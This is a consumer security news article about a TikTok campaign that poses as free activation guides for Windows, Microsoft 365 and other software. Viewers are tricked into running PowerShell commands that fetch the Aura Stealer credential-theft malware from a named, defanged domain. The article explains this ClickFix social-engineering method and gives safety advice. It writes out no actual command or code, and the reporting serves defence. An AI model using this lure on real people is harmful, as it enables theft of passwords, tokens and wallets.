Cybercriminals are increasingly exploiting TikTok as a platform to ensnare unsuspecting users. Their latest tactic involves masquerading malicious downloads as free activation guides for widely used software, including Windows, Microsoft 365, Photoshop, and even counterfeit versions of popular streaming services like Netflix and Spotify Premium. Security expert Xavier Mertens first identified this troubling campaign, which mirrors a similar scheme observed earlier this year. Reports from BleepingComputer indicate that these deceptive TikTok videos showcase brief PowerShell commands, misleading viewers into executing them as administrators to “activate” or “fix” their software.
In truth, these commands redirect users to a malicious website, subsequently downloading malware known as Aura Stealer. This insidious program stealthily extracts saved passwords, cookies, cryptocurrency wallets, and authentication tokens from the victim’s device.
How the TikTok scam works
This operation employs a method referred to as a ClickFix attack, a form of social engineering designed to make victims believe they are following legitimate technical instructions. The process appears straightforward: execute a simple command and gain immediate access to premium software. However, rather than activating any software, the PowerShell command links to a remote domain, slmgr[.]win, which retrieves harmful executables hosted on Cloudflare. The primary file, updater.exe, is a variant of Aura Stealer malware. Once it infiltrates a system, it seeks out user credentials and transmits them back to the attacker.
Another file, source.exe, utilizes Microsoft’s C# compiler to execute code directly in memory, complicating detection efforts. While the exact purpose of this additional payload remains unclear, its pattern aligns with previous malware used for cryptocurrency theft and ransomware deployment.
How to stay safe from TikTok malware scams
Despite the convincing nature of these scams, users can protect themselves by adhering to a few essential precautions:
1) Avoid shortcuts
Refrain from copying or executing PowerShell commands from TikTok videos or unfamiliar websites. If an offer promises free access to premium software, it is likely a scam.
2) Use trusted sources
Always download or activate software directly from official websites or reputable app stores.
3) Keep security tools updated
Ensure that your antivirus software and browsers are up to date, as outdated versions may fail to detect the latest threats.
4) Use strong antivirus software
Invest in robust antivirus software that provides real-time scanning and protection against trojans, info-stealers, and phishing attempts. This is crucial for safeguarding your devices and personal information.
5) Sign up for a data removal service
If your personal data is compromised, a data removal or monitoring service can notify you and assist in eliminating sensitive information from the web. While no service can guarantee complete data removal, these services actively monitor and erase personal information from numerous websites, enhancing your privacy.
6) Reset credentials
If you have followed dubious instructions or entered credentials after watching a “free activation” video, reset all your passwords immediately.
7) Use unique passwords
Utilize unique passwords for each account and consider employing a password manager to securely store and generate complex passwords, minimizing the risk of password reuse.
8) Enable multi-factor authentication
Add an extra layer of security by activating multi-factor authentication wherever possible. This ensures that even if your passwords are compromised, attackers will be unable to access your accounts without additional verification.
As TikTok continues to grow in popularity, it becomes an attractive target for scams like these. Users must remain vigilant, trust only verified sources, and recognize that shortcuts to free software often come with hidden costs to their security and peace of mind.
